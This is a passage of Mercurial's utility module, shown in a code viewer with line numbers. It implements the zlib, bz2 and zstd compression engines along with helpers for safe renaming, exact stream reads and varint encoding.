3562 3566 """zlib compression using the DEFLATE algorithm.
3563 3567
3564 3568 All Mercurial clients should support this format. The compression
3565 3569 algorithm strikes a reasonable balance between compression ratio
3566 3570 and size.
3567 3571 """
3568 3572 return 'gzip', 'GZ'
3569 3573
3570 3574 def wireprotosupport(self):
3571 3575 return compewireprotosupport('zlib', 20, 20)
3572 3576
3573 3577 def revlogheader(self):
3574 3578 return 'x'
3575 3579
3576 3580 def compressstream(self, it, opts=None):
3577 3581 opts = opts or {}
3578 3582
3579 3583 z = zlib.compressobj(opts.get('level', -1))
3580 3584 for chunk in it:
3581 3585 data = z.compress(chunk)
3582 3586 # Not all calls to compress emit data. It is cheaper to inspect
3583 3587 # here than to feed empty chunks through generator.
3584 3588 if data:
3585 3589 yield data
3586 3590
3587 3591 yield z.flush()
3588 3592
3589 3593 def decompressorreader(self, fh):
3590 3594 def gen():
3591 3595 d = zlib.decompressobj()
3592 3596 for chunk in filechunkiter(fh):
3593 3597 while chunk:
3594 3598 # Limit output size to limit memory.
3595 3599 yield d.decompress(chunk, 2 ** 18)
3596 3600 chunk = d.unconsumed_tail
3597 3601
3598 3602 return chunkbuffer(gen())
3599 3603
3600 3604 class zlibrevlogcompressor(object):
3601 3605 def compress(self, data):
3602 3606 insize = len(data)
3603 3607 # Caller handles empty input case.
3604 3608 assert insize > 0
3605 3609
3606 3610 if insize < 44:
3607 3611 return None
3608 3612
3609 3613 elif insize <= 1000000:
3610 3614 compressed = zlib.compress(data)
3611 3615 if len(compressed) < insize:
3612 3616 return compressed
3613 3617 return None
3614 3618
3615 3619 # zlib makes an internal copy of the input buffer, doubling
3616 3620 # memory usage for large inputs. So do streaming compression
3617 3621 # on large inputs.
3618 3622 else:
3619 3623 z = zlib.compressobj()
3620 3624 parts = []
3621 3625 pos = 0
3622 3626 while pos < insize:
3623 3627 pos2 = pos + 2**20
3624 3628 parts.append(z.compress(data[pos:pos2]))
3625 3629 pos = pos2
3626 3630 parts.append(z.flush())
3627 3631
3628 3632 if sum(map(len, parts)) < insize:
3629 3633 return ''.join(parts)
3630 3634 return None
3631 3635
3632 3636 def decompress(self, data):
3633 3637 try:
3634 3638 return zlib.decompress(data)
3635 3639 except zlib.error as e:
3636 3640 raise error.RevlogError(_('revlog decompress error: %s') %
3637 3641 forcebytestr(e))
3638 3642
3639 3643 def revlogcompressor(self, opts=None):
3640 3644 return self.zlibrevlogcompressor()
3641 3645
3642 3646 compengines.register(_zlibengine())
3643 3647
3644 3648 class _bz2engine(compressionengine):
3645 3649 def name(self):
3646 3650 return 'bz2'
3647 3651
3648 3652 def bundletype(self):
3649 3653 """An algorithm that produces smaller bundles than ``gzip``.
3650 3654
3651 3655 All Mercurial clients should support this format.
3652 3656
3653 3657 This engine will likely produce smaller bundles than ``gzip`` but
3654 3658 will be significantly slower, both during compression and
3655 3659 decompression.
3656 3660
3657 3661 If available, the ``zstd`` engine can yield similar or better
3658 3662 compression at much higher speeds.
3659 3663 """
3660 3664 return 'bzip2', 'BZ'
3661 3665
3662 3666 # We declare a protocol name but don't advertise by default because
3663 3667 # it is slow.
3664 3668 def wireprotosupport(self):
3665 3669 return compewireprotosupport('bzip2', 0, 0)
3666 3670
3667 3671 def compressstream(self, it, opts=None):
3668 3672 opts = opts or {}
3669 3673 z = bz2.BZ2Compressor(opts.get('level', 9))
3670 3674 for chunk in it:
3671 3675 data = z.compress(chunk)
3672 3676 if data:
3673 3677 yield data
3674 3678
3675 3679 yield z.flush()
3676 3680
3677 3681 def decompressorreader(self, fh):
3678 3682 def gen():
3679 3683 d = bz2.BZ2Decompressor()
3680 3684 for chunk in filechunkiter(fh):
3681 3685 yield d.decompress(chunk)
3682 3686
3683 3687 return chunkbuffer(gen())
3684 3688
3685 3689 compengines.register(_bz2engine())
3686 3690
3687 3691 class _truncatedbz2engine(compressionengine):
3688 3692 def name(self):
3689 3693 return 'bz2truncated'
3690 3694
3691 3695 def bundletype(self):
3692 3696 return None, '_truncatedBZ'
3693 3697
3694 3698 # We don't implement compressstream because it is hackily handled elsewhere.
3695 3699
3696 3700 def decompressorreader(self, fh):
3697 3701 def gen():
3698 3702 # The input stream doesn't have the 'BZ' header. So add it back.
3699 3703 d = bz2.BZ2Decompressor()
3700 3704 d.decompress('BZ')
3701 3705 for chunk in filechunkiter(fh):
3702 3706 yield d.decompress(chunk)
3703 3707
3704 3708 return chunkbuffer(gen())
3705 3709
3706 3710 compengines.register(_truncatedbz2engine())
3707 3711
3708 3712 class _noopengine(compressionengine):
3709 3713 def name(self):
3710 3714 return 'none'
3711 3715
3712 3716 def bundletype(self):
3713 3717 """No compression is performed.
3714 3718
3715 3719 Use this compression engine to explicitly disable compression.
3716 3720 """
3717 3721 return 'none', 'UN'
3718 3722
3719 3723 # Clients always support uncompressed payloads. Servers don't because
3720 3724 # unless you are on a fast network, uncompressed payloads can easily
3721 3725 # saturate your network pipe.
3722 3726 def wireprotosupport(self):
3723 3727 return compewireprotosupport('none', 0, 10)
3724 3728
3725 3729 # We don't implement revlogheader because it is handled specially
3726 3730 # in the revlog class.
3727 3731
3728 3732 def compressstream(self, it, opts=None):
3729 3733 return it
3730 3734
3731 3735 def decompressorreader(self, fh):
3732 3736 return fh
3733 3737
3734 3738 class nooprevlogcompressor(object):
3735 3739 def compress(self, data):
3736 3740 return None
3737 3741
3738 3742 def revlogcompressor(self, opts=None):
3739 3743 return self.nooprevlogcompressor()
3740 3744
3741 3745 compengines.register(_noopengine())
3742 3746
3743 3747 class _zstdengine(compressionengine):
3744 3748 def name(self):
3745 3749 return 'zstd'
3746 3750
3747 3751 @propertycache
3748 3752 def _module(self):
3749 3753 # Not all installs have the zstd module available. So defer importing
3750 3754 # until first access.
3751 3755 try:
3752 3756 from . import zstd
3753 3757 # Force delayed import.
3754 3758 zstd.__version__
3755 3759 return zstd
3756 3760 except ImportError:
3757 3761 return None
3758 3762
3759 3763 def available(self):
3760 3764 return bool(self._module)
3761 3765
3762 3766 def bundletype(self):
3763 3767 """A modern compression algorithm that is fast and highly flexible.
3764 3768
3765 3769 Only supported by Mercurial 4.1 and newer clients.
3766 3770
3767 3771 With the default settings, zstd compression is both faster and yields
3768 3772 better compression than ``gzip``. It also frequently yields better
3769 3773 compression than ``bzip2`` while operating at much higher speeds.
3770 3774
3771 3775 If this engine is available and backwards compatibility is not a
3772 3776 concern, it is likely the best available engine.
3773 3777 """
3774 3778 return 'zstd', 'ZS'
3775 3779
3776 3780 def wireprotosupport(self):
3777 3781 return compewireprotosupport('zstd', 50, 50)
3778 3782
3779 3783 def revlogheader(self):
3780 3784 return '\x28'
3781 3785
3782 3786 def compressstream(self, it, opts=None):
3783 3787 opts = opts or {}
3784 3788 # zstd level 3 is almost always significantly faster than zlib
3785 3789 # while providing no worse compression. It strikes a good balance
3786 3790 # between speed and compression.
3787 3791 level = opts.get('level', 3)
3788 3792
3789 3793 zstd = self._module
3790 3794 z = zstd.ZstdCompressor(level=level).compressobj()
3791 3795 for chunk in it:
3792 3796 data = z.compress(chunk)
3793 3797 if data:
3794 3798 yield data
3795 3799
3796 3800 yield z.flush()
3797 3801
3798 3802 def decompressorreader(self, fh):
3799 3803 zstd = self._module
3800 3804 dctx = zstd.ZstdDecompressor()
3801 3805 return chunkbuffer(dctx.read_from(fh))
3802 3806
3803 3807 class zstdrevlogcompressor(object):
3804 3808 def __init__(self, zstd, level=3):
3805 3809 # Writing the content size adds a few bytes to the output. However,
3806 3810 # it allows decompression to be more optimal since we can
3807 3811 # pre-allocate a buffer to hold the result.
3808 3812 self._cctx = zstd.ZstdCompressor(level=level,
3809 3813 write_content_size=True)
3810 3814 self._dctx = zstd.ZstdDecompressor()
3811 3815 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3812 3816 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3813 3817
3814 3818 def compress(self, data):
3815 3819 insize = len(data)
3816 3820 # Caller handles empty input case.
3817 3821 assert insize > 0
3818 3822
3819 3823 if insize < 50:
3820 3824 return None
3821 3825
3822 3826 elif insize <= 1000000:
3823 3827 compressed = self._cctx.compress(data)
3824 3828 if len(compressed) < insize:
3825 3829 return compressed
3826 3830 return None
3827 3831 else:
3828 3832 z = self._cctx.compressobj()
3829 3833 chunks = []
3830 3834 pos = 0
3831 3835 while pos < insize:
3832 3836 pos2 = pos + self._compinsize
3833 3837 chunk = z.compress(data[pos:pos2])
3834 3838 if chunk:
3835 3839 chunks.append(chunk)
3836 3840 pos = pos2
3837 3841 chunks.append(z.flush())
3838 3842
3839 3843 if sum(map(len, chunks)) < insize:
3840 3844 return ''.join(chunks)
3841 3845 return None
3842 3846
3843 3847 def decompress(self, data):
3844 3848 insize = len(data)
3845 3849
3846 3850 try:
3847 3851 # This was measured to be faster than other streaming
3848 3852 # decompressors.
3849 3853 dobj = self._dctx.decompressobj()
3850 3854 chunks = []
3851 3855 pos = 0
3852 3856 while pos < insize:
3853 3857 pos2 = pos + self._decompinsize
3854 3858 chunk = dobj.decompress(data[pos:pos2])
3855 3859 if chunk:
3856 3860 chunks.append(chunk)
3857 3861 pos = pos2
3858 3862 # Frame should be exhausted, so no finish() API.
3859 3863
3860 3864 return ''.join(chunks)
3861 3865 except Exception as e:
3862 3866 raise error.RevlogError(_('revlog decompress error: %s') %
3863 3867 forcebytestr(e))
3864 3868
3865 3869 def revlogcompressor(self, opts=None):
3866 3870 opts = opts or {}
3867 3871 return self.zstdrevlogcompressor(self._module,
3868 3872 level=opts.get('level', 3))
3869 3873
3870 3874 compengines.register(_zstdengine())
3871 3875
3872 3876 def bundlecompressiontopics():
3873 3877 """Obtains a list of available bundle compressions for use in help."""
3874 3878 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3875 3879 items = {}
3876 3880
3877 3881 # We need to format the docstring. So use a dummy object/type to hold it
3878 3882 # rather than mutating the original.
3879 3883 class docobject(object):
3880 3884 pass
3881 3885
3882 3886 for name in compengines:
3883 3887 engine = compengines[name]
3884 3888
3885 3889 if not engine.available():
3886 3890 continue
3887 3891
3888 3892 bt = engine.bundletype()
3889 3893 if not bt or not bt[0]:
3890 3894 continue
3891 3895
3892 3896 doc = pycompat.sysstr('``%s``\n %s') % (
3893 3897 bt[0], engine.bundletype.__doc__)
3894 3898
3895 3899 value = docobject()
3896 3900 value.__doc__ = doc
3897 3901 value._origdoc = engine.bundletype.__doc__
3898 3902 value._origfunc = engine.bundletype
3899 3903
3900 3904 items[bt[0]] = value
3901 3905
3902 3906 return items
3903 3907
3904 3908 i18nfunctions = bundlecompressiontopics().values()
3905 3909
3906 3910 # convenient shortcut
3907 3911 dst = debugstacktrace
3908 3912
3909 3913 def safename(f, tag, ctx, others=None):
3910 3914 """
3911 3915 Generate a name that it is safe to rename f to in the given context.
3912 3916
3913 3917 f: filename to rename
3914 3918 tag: a string tag that will be included in the new name
3915 3919 ctx: a context, in which the new name must not exist
3916 3920 others: a set of other filenames that the new name must not be in
3917 3921
3918 3922 Returns a file name of the form oldname~tag[~number] which does not exist
3919 3923 in the provided context and is not in the set of other names.
3920 3924 """
3921 3925 if others is None:
3922 3926 others = set()
3923 3927
3924 3928 fn = '%s~%s' % (f, tag)
3925 3929 if fn not in ctx and fn not in others:
3926 3930 return fn
3927 3931 for n in itertools.count(1):
3928 3932 fn = '%s~%s~%s' % (f, tag, n)
3929 3933 if fn not in ctx and fn not in others:
3930 3934 return fn
3931 3935
3932 3936 def readexactly(stream, n):
3933 3937 '''read n bytes from stream.read and abort if less was available'''
3934 3938 s = stream.read(n)
3935 3939 if len(s) < n:
3936 3940 raise error.Abort(_("stream ended unexpectedly"
3937 3941 " (got %d bytes, expected %d)")
3938 3942 % (len(s), n))
3939 3943 return s
3940 3944
3941 3945 def uvarintencode(value):
3942 3946 """Encode an unsigned integer value to a varint.
3943 3947
3944 3948 A varint is a variable length integer of 1 or more bytes. Each byte
3945 3949 except the last has the most significant bit set. The lower 7 bits of
3946 3950 each byte store the 2's complement representation, least significant group
3947 3951 first.
3948 3952
3949 3953 >>> uvarintencode(0)
3950 3954 '\\x00'
3951 3955 >>> uvarintencode(1)
3952 3956 '\\x01'
3953 3957 >>> uvarintencode(127)
3954 3958 '\\x7f'
3955 3959 >>> uvarintencode(1337)
3956 3960 '\\xb9\\n'
3957 3961 >>> uvarintencode(65536)
3958 3962 '\\x80\\x80\\x04'
3959 3963 >>> uvarintencode(-1)
3960 3964 Traceback (most recent call last):
3961 3965 ...
3962 3966 ProgrammingError: negative value for uvarint: -1
3963 3967 """
3964 3968 if value < 0:
3965 3969 raise error.ProgrammingError('negative value for uvarint: %d'
3966 3970 % value)
3967 3971 bits = value & 0x7f
3968 3972 value >>= 7
3969 3973 bytes = []
3970 3974 while value:
3971 3975 bytes.append(pycompat.bytechr(0x80 | bits))
3972 3976 bits = value & 0x7f
3973 3977 value >>= 7
3974 3978 bytes.append(pycompat.bytechr(bits))
3975 3979
3976 3980 return ''.join(bytes)
3977 3981
3978 3982 def uvarintdecodestream(fh):
3979 3983 """Decode an unsigned variable length integer from a stream.
3980 3984
3981 3985 The passed argument is anything that has a ``.read(N)`` method.
3982 3986
3983 3987 >>> try:
3984 3988 ... from StringIO import StringIO as BytesIO
3985 3989 ... except ImportError:
3986 3990 ... from io import BytesIO
3987 3991 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3988 3992 0
3989 3993 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3990 3994 1
3991 3995 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3992 3996 127
3993 3997 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3994 3998 1337
3995 3999 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3996 4000 65536
3997 4001 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3998 4002 Traceback (most recent call last):
3999 4003 ...
4000 4004 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4001 4005 """
4002 4006 result = 0
4003 4007 shift = 0
4004 4008 while True:
4005 4009 byte = ord(readexactly(fh, 1))
4006 4010 result |= ((byte & 0x7f) << shift)
4007 4011 if not (byte & 0x80):
4008 4012 return result
4009 4013 shift += 7
General Comments 0
You need to be logged in to leave comments. Login now